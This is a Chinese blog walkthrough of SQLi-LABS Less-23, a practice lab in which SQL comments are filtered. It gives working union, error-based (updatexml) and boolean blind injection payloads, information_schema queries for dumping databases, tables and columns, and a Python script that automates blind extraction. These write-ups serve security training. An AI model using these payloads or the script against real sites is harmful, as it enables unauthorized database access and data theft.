SQLi LABS Less 23 联合注入+报错注入+布尔盲注

已于 2022-04-15 06:49:27 修改
阅读量1.1w 收藏 4
点赞数 13
分类专栏: SQLi-LABS 靶场通关教程 文章标签: 网络安全 渗透测试
于 2021-08-15 13:01:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/119712311
版权

第23关是单引号字符型注入;

过滤了注释,使用闭合引号来绕过;

这篇文章提供联合注入、报错注入、布尔盲注三种解题方式。

一、功能分析

这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据并回显到页面中。

二、思路分析

过滤了注释,需要使用闭合来代替注释。

id有效时,页面会显示查询到的数据,适合联合注入。

参数中携带引号时,页面会返回数据库的报错信息,适合报错注入。

有效的id和无效的id分别对应不同的页面响应,适合布尔盲注。

三、解题步骤

方式一:联合注入

参考文章:联合注入使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1' and '1,页面正常显示

地址栏输入:?id=1' and '0,页面异常(空)显示

综上所述,可以确定,页面存在单引号字符型注入。

第二步、判断字段数

排序未被执行,原因不明,如果你知道为什么,欢迎在评论区留言。

按照以往的经验,暂定字段数为3。

第三步、判断显示位

地址栏输入:?id=0' union select 1,2,3 and '

第四步、脱库

获取当前使用的数据库,地址栏输入:

?id=0' union select 1,
	(database())
,3 and '

 执行结果:

 其余脱库操作时,将下图圈起来的部分替换成SQL语句即可:

 常用的脱库语句:

# 获取所有数据库
select group_concat(schema_name)
from information_schema.schemata
 
# 获取 security 库的所有表
select group_concat(table_name)
from information_schema.tables
where table_schema="security"
 
# 获取 users 表的所有字段
select group_concat(column_name)
from information_schema.columns
where table_schema="security" and table_name="users"

方式二:报错注入

参考文章:报错注入使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1'

从页面显示的数据库报错信息,可以判断注入点为单引号字符型。

第二步、判断报错条件

地址栏输入:?id=1' and updatexml(1,0x7e,3) and '

页面显示报错函数的内容,确定报错函数可用。

第三步、脱库

获取当前使用的数据库,地址栏输入:

?id=1' and updatexml(1,
	concat(0x7e,
		(database())
	)
,3) and '

 执行结果:

其余脱库操作时,将下图圈起来的部分替换为SQL语句即可:

 

方式三:布尔盲注

参考文章:布尔盲注使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1' and 1 and '1,页面正常显示。

地址栏输入:?id=1' and 0 and '1,页面异常(空)显示。

由此可知,注入点为单引号字符型注入。

第二步、判断长度

判断当前使用数据库名的长度,是否大于1,地址栏输入:

?id=1' and length(
	(database())
) >1 and '1

长度肯定大于1,页面正常显示,确定payload可用。

依次递增测试长度,稍后使用脚本猜解。

第三步、枚举字符

截取当前使用数据库名的第一个字符,并转换成ASCLL码,判断ASCLL码是否大于1,地址栏输入:

?id=1' and 
	ascii(
		substr(
			(database())
		,1,1)
	) >1 
and '1

 字符的AS。CLL码肯定大于1,页面正常响应,确定payload可用。

依次判断ASCLL码是否等于(32~126)。

确定第一个字符的内容后,再按照此方法猜解其余的字符,手动猜解效率太低,稍后使用脚本猜解。

脱库

Python自动化脚本如下,可按需修改:

import requests

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址(不带参数)
url = "http://9cc6eae3b17a43e9bb9d5c2ee065b20d.app.mituan.zone/Less-23/"
# 猜解长度使用的payload
payload_len = """?id=1' and length(
	(database())
) ={n} and '1"""
# 枚举字符使用的payload
payload_str = """?id=1' and 
	ascii(
		substr(
			(database())
		,{l},1)
	) ={n} 
and '1"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面中出现此内容则表示成功
        if 'Your Login name' in response.text:
            print('测试长度完成,长度为:', length,)
            return length;
        else:
            print('正在测试长度:',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环,截取每一个字符
    for l in range(1, length+1):
        # 第二层循环,枚举截取字符的每一种可能性
        for n in range(33, 126):
            response = requests.get(url= url+payload_str.format(l= l, n= n))
            # print('我正在猜解', n)
            # 页面中出现此内容则表示成功
            if 'Your Login name' in response.text:
                str+= chr(n)
                print('第', l, '个字符猜解成功:', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

执行结果:

其余脱库操作时,将下图圈中的部分替换成SQL语句即可:

 

士别三日wyx
关注
  • 13
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
sqlilabs过手册注入天书
08-17
sqlilabs过手册注入天书
Sqli-labs之Less-23
m0_46315342的博客
06-04 549
                                          &nbs...
sql绕过less-23 less-25 less-26 less-27 以及一点http头注入 less-18 less-5
最新发布
weixin_74182283的博客
04-01 1218
拆分该语句 为了完成绕过,需要先将id进行闭合 因此语句为 id='xx' || 1',此时多了个单引号出来,因此需要将其闭合,变成id='xx' || '1',语句为id='xx' || '1' 这时,因为||是可以替代or来进行使用的(这个是学计算机的基本常识),在语法中相当于或者,而此时右边的 '1' 永远为真(因为 '1' 永远都是’1‘ )因此可以通过该语句直接完成绕过。而我们这里的http头注入所运用的报错函数,他就是需要~才能导致报错的出现,因此只要存在波浪线,就可以确保这个函数报错。
Sql注入
aetlypdlg_ys的博客
01-24 1357
联合注入 判断注入点 GET['id'] ?id=n eg:127.0.0.1/sqli-labs/Less-1/?id=1 %23(#):过滤后面的语句 eg:127.0.0.1/sqli-labs/Less-1/?id=1' %23 加 ' 报错,再加%23(#)不报错,可判断一个注入点 整型注入注入的是1,2,3...... 字符型注入注入的是a,b,c,def...... 判断显示位(列) order by n n>列数 -->报错 n<=列数 --&
基于Sqli-Labs靶场的SQL注入-23~24
Joker
01-04 1197
重点讲二次注入
Less -23
weixin_43745072的博客
11-23 119
Less-23 注释符过滤 首先,在尝试'发现可以注入,但是在尝试注入之后一直报错。并且无论是#还是--+,回显都没有出现,初步判断是注释符过滤了。 查看源码可以看到,#和--+都被替换为了空字符。所以这次要考虑闭合掉引号,构造查询语句。 //filter the comments out so as to comments should not work $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $
SQL-labs的第23——注释被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 195
这说明只有第一个和第二个位置是回显位,我们只需要在这两个位置进行注入就行。其实只有第二个是回显位,第一个也不是。但是如果是3个null,那么不会报错,这说明总共有3个注入位置。我们有添加了),但是仍然报错,这时我们怀疑注释符被屏蔽了。接下来,我们看一下,那个位置可以进行回显。我们猜测闭合方式是'。说明闭合方式是',并且注释符被屏蔽了。我们发现这里好像有回显,我们输入语句。使用报错注入也可以。
通过sqli-labs学习sql注入——进阶挑战之less23-28a
热门推荐
giantbranch的专栏
06-10 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51457142   这次我又来了,Advanced Injections(进阶挑战),就是一些过滤绕过的东西了,基础挑战看这个两篇 最近搞逆向破解去了,http://www.giantbranch.cn/myblog/?p=27,所以这个拖得太久了,今天完工   通过sqli-la...
Sqli-labs 高级注入篇 (Less23~38)
angry_program的博客
02-02 884
目录 前言 Less-23 过滤注释的显错注入 Less-24 二次注入 Less-25 过滤and和or的显错注入 Less-26 过滤空格和注释符的显错注入 一、空格绕过注入 二、extracvalue函数的显错注入 三、布尔盲注 Less-26a 过滤空格、注释符的布尔盲注 Less-27 过滤联合查询键字的显错注入 Less-27a 过滤联合查询键字...
sqli-labs通(二十三)
qq_65950075的博客
05-08 448
这一是get类型当输入?id=1'时,出现报错信息,是由单引号闭合的但是输入?id=1'--+的时候,还是报错,说明我们的注释符可能被过滤处理了查看码源,确实是把注释符过滤了那我们还是根据语句构造?成功了判断字段数,这里不能用order by,只能不断往上加数字,不过一般都是3?说明是三个字段,只显示2号位,那我们就可以在这个位置进行注入?
sqli-labs23(基于get提交的过滤注释符的报错注入)
zyh1588的博客
01-15 1031
小白回顾sql靶场23
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部卡的详细解析,pdf文档
sqlilabs过手册注入天书.pdf
09-14
sqlilabs过手册注入天书.pdf
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
sqli-labs通全解---有过滤的绕过--less23,25~28,32~37--8
cyynid的博客
01-12 806
preg_replace()用于sql注入防护中,主要是将一些疑似攻击的代码进行替换处理,从而使得他无法达到攻击的目的,例如将‘/’替换成空格,将union替换成空格等,但是由于攻击方式的多样化和程序员的疏忽,往往无法过滤掉所有的攻击,甚至可以对此类过滤进行绕过处理。返回在预定义字符之前添加反斜杠的字符串。即将预定义的字符进行转义提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。本文列举了一些对此类过滤方法的绕过手段,同样,也可以针对绕过手段,进行更加安全的过滤。
Sqli-labs靶场详细攻略Less 23-28a
qq_41755084的博客
10-14 525
这一还是使用get方法进行注入,不过这次对、这些用于注释的字符做了过滤。这样我们可以使用两个进行绕过,第一个用于闭合原代码语句中的前一个,后一个用来闭合源代码语句中的后一个。在两个单引号中间加上我们想要执行的sql语句即可。在id参数上传入代码 发现回显的部分还是与基础部分的效果一样,也就是回显3列的查询,显示出的是第2,3列的内容。那么,就可以正常注入了,在union select的第2或3的位置放上查询的payload 查询成功。这一为二次排序注入,也叫存储型的注入,具体是将可能导致sql注入的字符
SQL注入 Less23(过滤注释符)
开心星人的博客
07-24 1508
先去掉左右两边各一个单引号,相当于语文中的引用。因为过滤了注释符,我们可以手动闭合后面的单引号。尝试使用union注入,因为是有回显点的。想使用报错注入的,因为是会有报错信息的。直接使用union,来逐个测试字段数。很明显知道是单引号闭合。这部分,导致语句出错了。...
sqlilab学习打卡|手工注入|Less23-Less31
spring!
04-02 1456
sqlilab学习打卡|手工注入|Less23-Less31
sqli labs less1 介绍
07-11
SQLi Labs 是一个用于学习和实践 SQL 注入技术的在线平台。它提供了一系列的挑战,每个挑战都涉及不同的 SQL 注入场景和技巧。 Less 1 是 SQLi Labs 中的第一个挑战,它旨在帮助用户了解基础的 SQL 注入概念和技术。在这个挑战中,你需要找到一个存在 SQL 注入漏洞的页面,并尝试注入恶意的 SQL 代码来获取敏感信息。 具体步骤如下: 1. 打开 SQLi Labs 平台,并找到 Less 1 的挑战。 2. 分析页面,确定存在注入漏洞的参数或输入框。 3. 尝试在注入点使用简单的注入技巧,如单引号注入布尔注入或时间延迟注入。 4. 观察页面返回的结果,判断是否存在漏洞。 5. 如果成功注入,尝试获取敏感信息,如数据库表名、列名或具体数据。 6. 利用 SQL 注入的结果,构造查询语句来获取所需的数据。 通过 Less 1 挑战,你可以熟悉 SQL 注入的基本原理和技巧,并为后续更复杂的挑战做好准备。请记住,在进行 SQL 注入实验时,请确保只在合法授权的环境中进行,并且遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值